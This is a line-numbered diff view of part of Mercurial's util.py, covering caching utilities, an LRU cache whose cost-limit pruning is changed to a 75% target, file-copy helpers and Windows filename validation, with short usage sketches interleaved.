959 959 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
960 960 logdata=False, logdataapis=True):
961 961 """Turn a socket into a logging socket."""
962 962
963 963 observer = socketobserver(logh, name, reads=reads, writes=writes,
964 964 states=states, logdata=logdata,
965 965 logdataapis=logdataapis)
966 966 return socketproxy(fh, observer)
967 967
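# The socket flavor works the same way; a minimal sketch assuming ``sock``
# is an already-connected socket:
def _examplemakeloggingsocket(logfh, sock):
    proxy = makeloggingsocket(logfh, sock, b'client', logdata=True)
    proxy.sendall(b'ping')  # logged as "client> sendall(4, 0)" + payload
    return proxy.recv(4)    # logged as "client> recv(4, 0) -> <n>" + payload
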
968 968 def version():
969 969 """Return version information if available."""
970 970 try:
971 971 from . import __version__
972 972 return __version__.version
973 973 except ImportError:
974 974 return 'unknown'
975 975
976 976 def versiontuple(v=None, n=4):
977 977 """Parses a Mercurial version string into an N-tuple.
978 978
979 979 The version string to be parsed is specified with the ``v`` argument.
980 980 If it isn't defined, the current Mercurial version string will be parsed.
981 981
982 982 ``n`` can be 2, 3, or 4. Here is how some version strings map to
983 983 returned values:
984 984
985 985 >>> v = b'3.6.1+190-df9b73d2d444'
986 986 >>> versiontuple(v, 2)
987 987 (3, 6)
988 988 >>> versiontuple(v, 3)
989 989 (3, 6, 1)
990 990 >>> versiontuple(v, 4)
991 991 (3, 6, 1, '190-df9b73d2d444')
992 992
993 993 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
994 994 (3, 6, 1, '190-df9b73d2d444+20151118')
995 995
996 996 >>> v = b'3.6'
997 997 >>> versiontuple(v, 2)
998 998 (3, 6)
999 999 >>> versiontuple(v, 3)
1000 1000 (3, 6, None)
1001 1001 >>> versiontuple(v, 4)
1002 1002 (3, 6, None, None)
1003 1003
1004 1004 >>> v = b'3.9-rc'
1005 1005 >>> versiontuple(v, 2)
1006 1006 (3, 9)
1007 1007 >>> versiontuple(v, 3)
1008 1008 (3, 9, None)
1009 1009 >>> versiontuple(v, 4)
1010 1010 (3, 9, None, 'rc')
1011 1011
1012 1012 >>> v = b'3.9-rc+2-02a8fea4289b'
1013 1013 >>> versiontuple(v, 2)
1014 1014 (3, 9)
1015 1015 >>> versiontuple(v, 3)
1016 1016 (3, 9, None)
1017 1017 >>> versiontuple(v, 4)
1018 1018 (3, 9, None, 'rc+2-02a8fea4289b')
1019 1019
1020 1020 >>> versiontuple(b'4.6rc0')
1021 1021 (4, 6, None, 'rc0')
1022 1022 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1023 1023 (4, 6, None, 'rc0+12-425d55e54f98')
1024 1024 >>> versiontuple(b'.1.2.3')
1025 1025 (None, None, None, '.1.2.3')
1026 1026 >>> versiontuple(b'12.34..5')
1027 1027 (12, 34, None, '..5')
1028 1028 >>> versiontuple(b'1.2.3.4.5.6')
1029 1029 (1, 2, 3, '.4.5.6')
1030 1030 """
1031 1031 if not v:
1032 1032 v = version()
1033 1033 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1034 1034 if not m:
1035 1035 vparts, extra = '', v
1036 1036 elif m.group(2):
1037 1037 vparts, extra = m.groups()
1038 1038 else:
1039 1039 vparts, extra = m.group(1), None
1040 1040
1041 1041 vints = []
1042 1042 for i in vparts.split('.'):
1043 1043 try:
1044 1044 vints.append(int(i))
1045 1045 except ValueError:
1046 1046 break
1047 1047 # (3, 6) -> (3, 6, None)
1048 1048 while len(vints) < 3:
1049 1049 vints.append(None)
1050 1050
1051 1051 if n == 2:
1052 1052 return (vints[0], vints[1])
1053 1053 if n == 3:
1054 1054 return (vints[0], vints[1], vints[2])
1055 1055 if n == 4:
1056 1056 return (vints[0], vints[1], vints[2], extra)
1057 1057
1058 1058 def cachefunc(func):
1059 1059 '''cache the result of function calls'''
1060 1060 # XXX doesn't handle keyword args
1061 1061 if func.__code__.co_argcount == 0:
1062 1062 cache = []
1063 1063 def f():
1064 1064 if len(cache) == 0:
1065 1065 cache.append(func())
1066 1066 return cache[0]
1067 1067 return f
1068 1068 cache = {}
1069 1069 if func.__code__.co_argcount == 1:
1070 1070 # we gain a small amount of time because
1071 1071 # we don't need to pack/unpack the list
1072 1072 def f(arg):
1073 1073 if arg not in cache:
1074 1074 cache[arg] = func(arg)
1075 1075 return cache[arg]
1076 1076 else:
1077 1077 def f(*args):
1078 1078 if args not in cache:
1079 1079 cache[args] = func(*args)
1080 1080 return cache[args]
1081 1081
1082 1082 return f
1083 1083
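# A minimal sketch of cachefunc on a pure single-argument function:
def _examplecachefunc():
    calls = []
    def square(x):
        calls.append(x)
        return x * x
    cached = cachefunc(square)
    assert cached(3) == 9
    assert cached(3) == 9
    assert calls == [3]  # the second call was served from the cache
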
1084 1084 class cow(object):
1085 1085 """helper class to make copy-on-write easier
1086 1086
1087 1087 Call preparewrite before doing any writes.
1088 1088 """
1089 1089
1090 1090 def preparewrite(self):
1091 1091 """call this before writes, return self or a copied new object"""
1092 1092 if getattr(self, '_copied', 0):
1093 1093 self._copied -= 1
1094 1094 return self.__class__(self)
1095 1095 return self
1096 1096
1097 1097 def copy(self):
1098 1098 """always do a cheap copy"""
1099 1099 self._copied = getattr(self, '_copied', 0) + 1
1100 1100 return self
1101 1101
1102 1102 class sortdict(collections.OrderedDict):
1103 1103 '''a simple sorted dictionary
1104 1104
1105 1105 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 1106 >>> d2 = d1.copy()
1107 1107 >>> d2
1108 1108 sortdict([('a', 0), ('b', 1)])
1109 1109 >>> d2.update([(b'a', 2)])
1110 1110 >>> list(d2.keys()) # should still be in last-set order
1111 1111 ['b', 'a']
1112 1112 '''
1113 1113
1114 1114 def __setitem__(self, key, value):
1115 1115 if key in self:
1116 1116 del self[key]
1117 1117 super(sortdict, self).__setitem__(key, value)
1118 1118
1119 1119 if pycompat.ispypy:
1120 1120 # __setitem__() isn't called as of PyPy 5.8.0
1121 1121 def update(self, src):
1122 1122 if isinstance(src, dict):
1123 1123 src = src.iteritems()
1124 1124 for k, v in src:
1125 1125 self[k] = v
1126 1126
1127 1127 class cowdict(cow, dict):
1128 1128 """copy-on-write dict
1129 1129
1130 1130 Be sure to call d = d.preparewrite() before writing to d.
1131 1131
1132 1132 >>> a = cowdict()
1133 1133 >>> a is a.preparewrite()
1134 1134 True
1135 1135 >>> b = a.copy()
1136 1136 >>> b is a
1137 1137 True
1138 1138 >>> c = b.copy()
1139 1139 >>> c is a
1140 1140 True
1141 1141 >>> a = a.preparewrite()
1142 1142 >>> b is a
1143 1143 False
1144 1144 >>> a is a.preparewrite()
1145 1145 True
1146 1146 >>> c = c.preparewrite()
1147 1147 >>> b is c
1148 1148 False
1149 1149 >>> b is b.preparewrite()
1150 1150 True
1151 1151 """
1152 1152
1153 1153 class cowsortdict(cow, sortdict):
1154 1154 """copy-on-write sortdict
1155 1155
1156 1156 Be sure to call d = d.preparewrite() before writing to d.
1157 1157 """
1158 1158
1159 1159 class transactional(object):
1160 1160 """Base class for making a transactional type into a context manager."""
1161 1161 __metaclass__ = abc.ABCMeta
1162 1162
1163 1163 @abc.abstractmethod
1164 1164 def close(self):
1165 1165 """Successfully closes the transaction."""
1166 1166
1167 1167 @abc.abstractmethod
1168 1168 def release(self):
1169 1169 """Marks the end of the transaction.
1170 1170
1171 1171 If the transaction has not been closed, it will be aborted.
1172 1172 """
1173 1173
1174 1174 def __enter__(self):
1175 1175 return self
1176 1176
1177 1177 def __exit__(self, exc_type, exc_val, exc_tb):
1178 1178 try:
1179 1179 if exc_type is None:
1180 1180 self.close()
1181 1181 finally:
1182 1182 self.release()
1183 1183
1184 1184 @contextlib.contextmanager
1185 1185 def acceptintervention(tr=None):
1186 1186 """A context manager that closes the transaction on InterventionRequired
1187 1187
1188 1188 If no transaction was provided, this simply runs the body and returns
1189 1189 """
1190 1190 if not tr:
1191 1191 yield
1192 1192 return
1193 1193 try:
1194 1194 yield
1195 1195 tr.close()
1196 1196 except error.InterventionRequired:
1197 1197 tr.close()
1198 1198 raise
1199 1199 finally:
1200 1200 tr.release()
1201 1201
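# A minimal sketch, assuming ``tr`` is a transaction and ``performstep`` is
# a hypothetical helper that may raise InterventionRequired:
def _exampleacceptintervention(tr, performstep):
    with acceptintervention(tr):
        performstep()
    # On InterventionRequired the transaction is closed (work so far is
    # kept) and the exception propagates; other errors abort it as usual.
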
1202 1202 @contextlib.contextmanager
1203 1203 def nullcontextmanager():
1204 1204 yield
1205 1205
1206 1206 class _lrucachenode(object):
1207 1207 """A node in a doubly linked list.
1208 1208
1209 1209 Holds a reference to nodes on either side as well as a key-value
1210 1210 pair for the dictionary entry.
1211 1211 """
1212 1212 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1213 1213
1214 1214 def __init__(self):
1215 1215 self.next = None
1216 1216 self.prev = None
1217 1217
1218 1218 self.key = _notset
1219 1219 self.value = None
1220 1220 self.cost = 0
1221 1221
1222 1222 def markempty(self):
1223 1223 """Mark the node as emptied."""
1224 1224 self.key = _notset
1225 1225 self.value = None
1226 1226 self.cost = 0
1227 1227
1228 1228 class lrucachedict(object):
1229 1229 """Dict that caches most recent accesses and sets.
1230 1230
1231 1231 The dict consists of an actual backing dict - indexed by original
1232 1232 key - and a doubly linked circular list defining the order of entries in
1233 1233 the cache.
1234 1234
1235 1235 The head node is the newest entry in the cache. If the cache is full,
1236 1236 we recycle head.prev and make it the new head. Cache accesses result in
1237 1237 the node being moved to before the existing head and being marked as the
1238 1238 new head node.
1239 1239
1240 1240 Items in the cache can be inserted with an optional "cost" value. This is
1241 1241 simply an integer that is specified by the caller. The cache can be queried
1242 1242 for the total cost of all items presently in the cache.
1243 1243
1244 1244 The cache can also define a maximum cost. If a cache insertion would
1245 1245 cause the total cost of the cache to go beyond the maximum cost limit,
1246 1246 nodes will be evicted to make room for the new node. This can be used
1247 1247 to e.g. set a max memory limit and associate an estimated bytes size
1248 1248 cost to each item in the cache. By default, no maximum cost is enforced.
1249 1249 """
1250 1250 def __init__(self, max, maxcost=0):
1251 1251 self._cache = {}
1252 1252
1253 1253 self._head = head = _lrucachenode()
1254 1254 head.prev = head
1255 1255 head.next = head
1256 1256 self._size = 1
1257 1257 self.capacity = max
1258 1258 self.totalcost = 0
1259 1259 self.maxcost = maxcost
1260 1260
1261 1261 def __len__(self):
1262 1262 return len(self._cache)
1263 1263
1264 1264 def __contains__(self, k):
1265 1265 return k in self._cache
1266 1266
1267 1267 def __iter__(self):
1268 1268 # We don't have to iterate in cache order, but why not.
1269 1269 n = self._head
1270 1270 for i in range(len(self._cache)):
1271 1271 yield n.key
1272 1272 n = n.next
1273 1273
1274 1274 def __getitem__(self, k):
1275 1275 node = self._cache[k]
1276 1276 self._movetohead(node)
1277 1277 return node.value
1278 1278
1279 1279 def insert(self, k, v, cost=0):
1280 1280 """Insert a new item in the cache with optional cost value."""
1281 1281 node = self._cache.get(k)
1282 1282 # Replace existing value and mark as newest.
1283 1283 if node is not None:
1284 1284 self.totalcost -= node.cost
1285 1285 node.value = v
1286 1286 node.cost = cost
1287 1287 self.totalcost += cost
1288 1288 self._movetohead(node)
1289 1289
1290 1290 if self.maxcost:
1291 1291 self._enforcecostlimit()
1292 1292
1293 1293 return
1294 1294
1295 1295 if self._size < self.capacity:
1296 1296 node = self._addcapacity()
1297 1297 else:
1298 1298 # Grab the last/oldest item.
1299 1299 node = self._head.prev
1300 1300
1301 1301 # At capacity. Kill the old entry.
1302 1302 if node.key is not _notset:
1303 1303 self.totalcost -= node.cost
1304 1304 del self._cache[node.key]
1305 1305
1306 1306 node.key = k
1307 1307 node.value = v
1308 1308 node.cost = cost
1309 1309 self.totalcost += cost
1310 1310 self._cache[k] = node
1311 1311 # And mark it as newest entry. No need to adjust order since it
1312 1312 # is already self._head.prev.
1313 1313 self._head = node
1314 1314
1315 1315 if self.maxcost:
1316 1316 self._enforcecostlimit()
1317 1317
1318 1318 def __setitem__(self, k, v):
1319 1319 self.insert(k, v)
1320 1320
1321 1321 def __delitem__(self, k):
1322 1322 node = self._cache.pop(k)
1323 1323 self.totalcost -= node.cost
1324 1324 node.markempty()
1325 1325
1326 1326 # Temporarily mark as newest item before re-adjusting head to make
1327 1327 # this node the oldest item.
1328 1328 self._movetohead(node)
1329 1329 self._head = node.next
1330 1330
1331 1331 # Additional dict methods.
1332 1332
1333 1333 def get(self, k, default=None):
1334 1334 try:
1335 1335 return self._cache[k].value
1336 1336 except KeyError:
1337 1337 return default
1338 1338
1339 1339 def clear(self):
1340 1340 n = self._head
1341 1341 while n.key is not _notset:
1342 1342 self.totalcost -= n.cost
1343 1343 n.markempty()
1344 1344 n = n.next
1345 1345
1346 1346 self._cache.clear()
1347 1347
1348 1348 def copy(self, capacity=None, maxcost=0):
1349 1349 """Create a new cache as a copy of the current one.
1350 1350
1351 1351 By default, the new cache has the same capacity as the existing one.
1352 1352 But, the cache capacity can be changed as part of performing the
1353 1353 copy.
1354 1354
1355 1355 Items in the copy have an insertion/access order matching this
1356 1356 instance.
1357 1357 """
1358 1358
1359 1359 capacity = capacity or self.capacity
1360 1360 maxcost = maxcost or self.maxcost
1361 1361 result = lrucachedict(capacity, maxcost=maxcost)
1362 1362
1363 1363 # We copy entries by iterating in oldest-to-newest order so the copy
1364 1364 # has the correct ordering.
1365 1365
1366 1366 # Find the first non-empty entry.
1367 1367 n = self._head.prev
1368 1368 while n.key is _notset and n is not self._head:
1369 1369 n = n.prev
1370 1370
1371 1371 # We could potentially skip the first N items when decreasing capacity.
1372 1372 # But let's keep it simple unless it is a performance problem.
1373 1373 for i in range(len(self._cache)):
1374 1374 result.insert(n.key, n.value, cost=n.cost)
1375 1375 n = n.prev
1376 1376
1377 1377 return result
1378 1378
1379 1379 def popoldest(self):
1380 1380 """Remove the oldest item from the cache.
1381 1381
1382 1382 Returns the (key, value) describing the removed cache entry.
1383 1383 """
1384 1384 if not self._cache:
1385 1385 return
1386 1386
1387 1387 # Walk the linked list backwards starting at tail node until we hit
1388 1388 # a non-empty node.
1389 1389 n = self._head.prev
1390 1390 while n.key is _notset:
1391 1391 n = n.prev
1392 1392
1393 1393 key, value = n.key, n.value
1394 1394
1395 1395 # And remove it from the cache and mark it as empty.
1396 1396 del self._cache[n.key]
1397 1397 self.totalcost -= n.cost
1398 1398 n.markempty()
1399 1399
1400 1400 return key, value
1401 1401
1402 1402 def _movetohead(self, node):
1403 1403 """Mark a node as the newest, making it the new head.
1404 1404
1405 1405 When a node is accessed, it becomes the freshest entry in the LRU
1406 1406 list, which is denoted by self._head.
1407 1407
1408 1408 Visually, let's make ``N`` the new head node (* denotes head):
1409 1409
1410 1410 previous/oldest <-> head <-> next/next newest
1411 1411
1412 1412 ----<->--- A* ---<->-----
1413 1413 | |
1414 1414 E <-> D <-> N <-> C <-> B
1415 1415
1416 1416 To:
1417 1417
1418 1418 ----<->--- N* ---<->-----
1419 1419 | |
1420 1420 E <-> D <-> C <-> B <-> A
1421 1421
1422 1422 This requires the following moves:
1423 1423
1424 1424 C.next = D (node.prev.next = node.next)
1425 1425 D.prev = C (node.next.prev = node.prev)
1426 1426 E.next = N (head.prev.next = node)
1427 1427 N.prev = E (node.prev = head.prev)
1428 1428 N.next = A (node.next = head)
1429 1429 A.prev = N (head.prev = node)
1430 1430 """
1431 1431 head = self._head
1432 1432 # C.next = D
1433 1433 node.prev.next = node.next
1434 1434 # D.prev = C
1435 1435 node.next.prev = node.prev
1436 1436 # N.prev = E
1437 1437 node.prev = head.prev
1438 1438 # N.next = A
1439 1439 # It is tempting to do just "head" here, however if node is
1440 1440 # adjacent to head, this will do bad things.
1441 1441 node.next = head.prev.next
1442 1442 # E.next = N
1443 1443 node.next.prev = node
1444 1444 # A.prev = N
1445 1445 node.prev.next = node
1446 1446
1447 1447 self._head = node
1448 1448
1449 1449 def _addcapacity(self):
1450 1450 """Add a node to the circular linked list.
1451 1451
1452 1452 The new node is inserted before the head node.
1453 1453 """
1454 1454 head = self._head
1455 1455 node = _lrucachenode()
1456 1456 head.prev.next = node
1457 1457 node.prev = head.prev
1458 1458 node.next = head
1459 1459 head.prev = node
1460 1460 self._size += 1
1461 1461 return node
1462 1462
1463 1463 def _enforcecostlimit(self):
1464 1464 # This should run after an insertion. It should only be called if total
1465 1465 # cost limits are being enforced.
1466 1466 # The most recently inserted node is never evicted.
1467 1467 if len(self) <= 1 or self.totalcost <= self.maxcost:
1468 1468 return
1469 1469
1470 1470 # This is logically equivalent to calling popoldest() until we
1471 1471 # free up enough cost. We don't do that since popoldest() needs
1472 1472 # to walk the linked list and doing this in a loop would be
1473 1473 # quadratic. So we find the first non-empty node and then
1474 1474 # walk nodes until we free up enough capacity.
1475 #
1476 # If we only removed the minimum number of nodes to free enough
1477 # cost at insert time, chances are high that the next insert would
1478 # also require pruning. This would effectively constitute quadratic
1479 # behavior for insert-heavy workloads. To mitigate this, we set a
1480 # target cost that is a percentage of the max cost. This will tend
1481 # to free more nodes when the high water mark is reached, which
1482 # lowers the chances of needing to prune on the subsequent insert.
1483 targetcost = int(self.maxcost * 0.75)
1484
1475 1485 n = self._head.prev
1476 1486 while n.key is _notset:
1477 1487 n = n.prev
1478 1488
1479 while len(self) > 1 and self.totalcost > self.maxcost:
1489 while len(self) > 1 and self.totalcost > targetcost:
1480 1490 del self._cache[n.key]
1481 1491 self.totalcost -= n.cost
1482 1492 n.markempty()
1483 1493 n = n.prev
1484 1494
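# A minimal sketch of cost-based eviction: going over maxcost prunes down
# to the 0.75 water mark, not merely back under the limit, so back-to-back
# inserts rarely trigger pruning twice.
def _examplelrucachedictcost():
    d = lrucachedict(10, maxcost=100)
    for i in range(10):
        d.insert(i, str(i), cost=10)  # totalcost == 100, exactly at the limit
    d.insert(10, '10', cost=30)       # would be 120: evict oldest entries
    assert d.totalcost == 70          # pruned past targetcost = 75
    assert len(d) == 5                # keys 6..10 survive
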
1485 1495 def lrucachefunc(func):
1486 1496 '''cache most recent results of function calls'''
1487 1497 cache = {}
1488 1498 order = collections.deque()
1489 1499 if func.__code__.co_argcount == 1:
1490 1500 def f(arg):
1491 1501 if arg not in cache:
1492 1502 if len(cache) > 20:
1493 1503 del cache[order.popleft()]
1494 1504 cache[arg] = func(arg)
1495 1505 else:
1496 1506 order.remove(arg)
1497 1507 order.append(arg)
1498 1508 return cache[arg]
1499 1509 else:
1500 1510 def f(*args):
1501 1511 if args not in cache:
1502 1512 if len(cache) > 20:
1503 1513 del cache[order.popleft()]
1504 1514 cache[args] = func(*args)
1505 1515 else:
1506 1516 order.remove(args)
1507 1517 order.append(args)
1508 1518 return cache[args]
1509 1519
1510 1520 return f
1511 1521
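# A minimal sketch of lrucachefunc; only the most recently used argument
# values (about 20) stay cached:
def _examplelrucachefunc():
    expensive = lrucachefunc(lambda x: x * x)
    for i in range(30):
        expensive(i)  # older entries fall out along the way
    assert expensive(29) == 841
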
1512 1522 class propertycache(object):
1513 1523 def __init__(self, func):
1514 1524 self.func = func
1515 1525 self.name = func.__name__
1516 1526 def __get__(self, obj, type=None):
1517 1527 result = self.func(obj)
1518 1528 self.cachevalue(obj, result)
1519 1529 return result
1520 1530
1521 1531 def cachevalue(self, obj, value):
1522 1532 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1523 1533 obj.__dict__[self.name] = value
1524 1534
1525 1535 def clearcachedproperty(obj, prop):
1526 1536 '''clear a cached property value, if one has been set'''
1527 1537 if prop in obj.__dict__:
1528 1538 del obj.__dict__[prop]
1529 1539
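# A minimal sketch of propertycache: the first access stores the computed
# value in the instance __dict__, shadowing the descriptor thereafter.
class _examplecached(object):
    @propertycache
    def answer(self):
        return 42  # runs once; clearcachedproperty() forces a recompute
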
1530 1540 def increasingchunks(source, min=1024, max=65536):
1531 1541 '''return no less than min bytes per chunk while data remains,
1532 1542 doubling min after each chunk until it reaches max'''
1533 1543 def log2(x):
1534 1544 if not x:
1535 1545 return 0
1536 1546 i = 0
1537 1547 while x:
1538 1548 x >>= 1
1539 1549 i += 1
1540 1550 return i - 1
1541 1551
1542 1552 buf = []
1543 1553 blen = 0
1544 1554 for chunk in source:
1545 1555 buf.append(chunk)
1546 1556 blen += len(chunk)
1547 1557 if blen >= min:
1548 1558 if min < max:
1549 1559 min = min << 1
1550 1560 nmin = 1 << log2(blen)
1551 1561 if nmin > min:
1552 1562 min = nmin
1553 1563 if min > max:
1554 1564 min = max
1555 1565 yield ''.join(buf)
1556 1566 blen = 0
1557 1567 buf = []
1558 1568 if buf:
1559 1569 yield ''.join(buf)
1560 1570
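# A minimal sketch: many tiny chunks are regrouped into progressively
# larger ones, amortizing per-chunk overhead for the consumer.
def _exampleincreasingchunks():
    source = (b'x' * 100 for _ in range(5000))
    sizes = [len(c) for c in increasingchunks(source)]
    assert all(s >= 1024 for s in sizes[:-1])  # min starts at 1024 and grows
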
1561 1571 def always(fn):
1562 1572 return True
1563 1573
1564 1574 def never(fn):
1565 1575 return False
1566 1576
1567 1577 def nogc(func):
1568 1578 """disable garbage collector
1569 1579
1570 1580 Python's garbage collector triggers a GC each time a certain number of
1571 1581 container objects (the number being defined by gc.get_threshold()) are
1572 1582 allocated even when marked not to be tracked by the collector. Tracking has
1573 1583 no effect on when GCs are triggered, only on what objects the GC looks
1574 1584 into. As a workaround, disable GC while building complex (huge)
1575 1585 containers.
1576 1586
1577 1587 This garbage collector issue has been fixed in 2.7. But it still affects
1578 1588 CPython's performance.
1579 1589 """
1580 1590 def wrapper(*args, **kwargs):
1581 1591 gcenabled = gc.isenabled()
1582 1592 gc.disable()
1583 1593 try:
1584 1594 return func(*args, **kwargs)
1585 1595 finally:
1586 1596 if gcenabled:
1587 1597 gc.enable()
1588 1598 return wrapper
1589 1599
1590 1600 if pycompat.ispypy:
1591 1601 # PyPy runs slower with gc disabled
1592 1602 nogc = lambda x: x
1593 1603
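# A minimal sketch of nogc on a hypothetical builder of a large container,
# keeping the cyclic collector from firing mid-construction:
@nogc
def _examplebuildmap(entries):
    return {e: [e] for e in entries}
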
1594 1604 def pathto(root, n1, n2):
1595 1605 '''return the relative path from one place to another.
1596 1606 root should use os.sep to separate directories
1597 1607 n1 should use os.sep to separate directories
1598 1608 n2 should use "/" to separate directories
1599 1609 returns an os.sep-separated path.
1600 1610
1601 1611 If n1 is a relative path, it's assumed it's
1602 1612 relative to root.
1603 1613 n2 should always be relative to root.
1604 1614 '''
1605 1615 if not n1:
1606 1616 return localpath(n2)
1607 1617 if os.path.isabs(n1):
1608 1618 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1609 1619 return os.path.join(root, localpath(n2))
1610 1620 n2 = '/'.join((pconvert(root), n2))
1611 1621 a, b = splitpath(n1), n2.split('/')
1612 1622 a.reverse()
1613 1623 b.reverse()
1614 1624 while a and b and a[-1] == b[-1]:
1615 1625 a.pop()
1616 1626 b.pop()
1617 1627 b.reverse()
1618 1628 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1619 1629
1620 1630 # the location of data files matching the source code
1621 1631 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1622 1632 # executable version (py2exe) doesn't support __file__
1623 1633 datapath = os.path.dirname(pycompat.sysexecutable)
1624 1634 else:
1625 1635 datapath = os.path.dirname(pycompat.fsencode(__file__))
1626 1636
1627 1637 i18n.setdatapath(datapath)
1628 1638
1629 1639 def checksignature(func):
1630 1640 '''wrap a function with code to check for calling errors'''
1631 1641 def check(*args, **kwargs):
1632 1642 try:
1633 1643 return func(*args, **kwargs)
1634 1644 except TypeError:
1635 1645 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1636 1646 raise error.SignatureError
1637 1647 raise
1638 1648
1639 1649 return check
1640 1650
1641 1651 # a whitelist of known filesystems where hardlinks work reliably
1642 1652 _hardlinkfswhitelist = {
1643 1653 'apfs',
1644 1654 'btrfs',
1645 1655 'ext2',
1646 1656 'ext3',
1647 1657 'ext4',
1648 1658 'hfs',
1649 1659 'jfs',
1650 1660 'NTFS',
1651 1661 'reiserfs',
1652 1662 'tmpfs',
1653 1663 'ufs',
1654 1664 'xfs',
1655 1665 'zfs',
1656 1666 }
1657 1667
1658 1668 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1659 1669 '''copy a file, preserving mode and optionally other stat info like
1660 1670 atime/mtime
1661 1671
1662 1672 checkambig argument is used with filestat, and is useful only if
1663 1673 destination file is guarded by any lock (e.g. repo.lock or
1664 1674 repo.wlock).
1665 1675
1666 1676 copystat and checkambig should be exclusive.
1667 1677 '''
1668 1678 assert not (copystat and checkambig)
1669 1679 oldstat = None
1670 1680 if os.path.lexists(dest):
1671 1681 if checkambig:
1672 1682 oldstat = checkambig and filestat.frompath(dest)
1673 1683 unlink(dest)
1674 1684 if hardlink:
1675 1685 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1676 1686 # unless we are confident that dest is on a whitelisted filesystem.
1677 1687 try:
1678 1688 fstype = getfstype(os.path.dirname(dest))
1679 1689 except OSError:
1680 1690 fstype = None
1681 1691 if fstype not in _hardlinkfswhitelist:
1682 1692 hardlink = False
1683 1693 if hardlink:
1684 1694 try:
1685 1695 oslink(src, dest)
1686 1696 return
1687 1697 except (IOError, OSError):
1688 1698 pass # fall back to normal copy
1689 1699 if os.path.islink(src):
1690 1700 os.symlink(os.readlink(src), dest)
1691 1701 # copytime is ignored for symlinks, but in general copytime isn't needed
1692 1702 # for them anyway
1693 1703 else:
1694 1704 try:
1695 1705 shutil.copyfile(src, dest)
1696 1706 if copystat:
1697 1707 # copystat also copies mode
1698 1708 shutil.copystat(src, dest)
1699 1709 else:
1700 1710 shutil.copymode(src, dest)
1701 1711 if oldstat and oldstat.stat:
1702 1712 newstat = filestat.frompath(dest)
1703 1713 if newstat.isambig(oldstat):
1704 1714 # stat of copied file is ambiguous to original one
1705 1715 advanced = (
1706 1716 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1707 1717 os.utime(dest, (advanced, advanced))
1708 1718 except shutil.Error as inst:
1709 1719 raise error.Abort(str(inst))
1710 1720
1711 1721 def copyfiles(src, dst, hardlink=None, progress=None):
1712 1722 """Copy a directory tree using hardlinks if possible."""
1713 1723 num = 0
1714 1724
1715 1725 def settopic():
1716 1726 if progress:
1717 1727 progress.topic = _('linking') if hardlink else _('copying')
1718 1728
1719 1729 if os.path.isdir(src):
1720 1730 if hardlink is None:
1721 1731 hardlink = (os.stat(src).st_dev ==
1722 1732 os.stat(os.path.dirname(dst)).st_dev)
1723 1733 settopic()
1724 1734 os.mkdir(dst)
1725 1735 for name, kind in listdir(src):
1726 1736 srcname = os.path.join(src, name)
1727 1737 dstname = os.path.join(dst, name)
1728 1738 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1729 1739 num += n
1730 1740 else:
1731 1741 if hardlink is None:
1732 1742 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1733 1743 os.stat(os.path.dirname(dst)).st_dev)
1734 1744 settopic()
1735 1745
1736 1746 if hardlink:
1737 1747 try:
1738 1748 oslink(src, dst)
1739 1749 except (IOError, OSError):
1740 1750 hardlink = False
1741 1751 shutil.copy(src, dst)
1742 1752 else:
1743 1753 shutil.copy(src, dst)
1744 1754 num += 1
1745 1755 if progress:
1746 1756 progress.increment()
1747 1757
1748 1758 return hardlink, num
1749 1759
1750 1760 _winreservednames = {
1751 1761 'con', 'prn', 'aux', 'nul',
1752 1762 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1753 1763 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1754 1764 }
1755 1765 _winreservedchars = ':*?"<>|'
1756 1766 def checkwinfilename(path):
1757 1767 r'''Check that the base-relative path is a valid filename on Windows.
1758 1768 Returns None if the path is ok, or a UI string describing the problem.
1759 1769
1760 1770 >>> checkwinfilename(b"just/a/normal/path")
1761 1771 >>> checkwinfilename(b"foo/bar/con.xml")
1762 1772 "filename contains 'con', which is reserved on Windows"
1763 1773 >>> checkwinfilename(b"foo/con.xml/bar")
1764 1774 "filename contains 'con', which is reserved on Windows"
1765 1775 >>> checkwinfilename(b"foo/bar/xml.con")
1766 1776 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1767 1777 "filename contains 'AUX', which is reserved on Windows"
1768 1778 >>> checkwinfilename(b"foo/bar/bla:.txt")
1769 1779 "filename contains ':', which is reserved on Windows"
1770 1780 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1771 1781 "filename contains '\\x07', which is invalid on Windows"
1772 1782 >>> checkwinfilename(b"foo/bar/bla ")
1773 1783 "filename ends with ' ', which is not allowed on Windows"
1774 1784 >>> checkwinfilename(b"../bar")
1775 1785 >>> checkwinfilename(b"foo\\")
1776 1786 "filename ends with '\\', which is invalid on Windows"
1777 1787 >>> checkwinfilename(b"foo\\/bar")
1778 1788 "directory name ends with '\\', which is invalid on Windows"
1779 1789 '''
1780 1790 if path.endswith('\\'):
1781 1791 return _("filename ends with '\\', which is invalid on Windows")
1782 1792 if '\\/' in path:
1783 1793 return _("directory name ends with '\\', which is invalid on Windows")
1784 1794 for n in path.replace('\\', '/').split('/'):
1785 1795 if not n:
1786 1796 continue
1787 1797 for c in _filenamebytestr(n):
1788 1798 if c in _winreservedchars:
1789 1799 return _("filename contains '%s', which is reserved "
1790 1800 "on Windows") % c
1791 1801 if ord(c) <= 31:
1792 1802 return _("filename contains '%s', which is invalid "
1793 1803 "on Windows") % stringutil.escapestr(c)
1794 1804 base = n.split('.')[0]
1795 1805 if base and base.lower() in _winreservednames:
1796 1806 return _("filename contains '%s', which is reserved "
1797 1807 "on Windows") % base
1798 1808 t = n[-1:]
1799 1809 if t in '. ' and n not in '..':
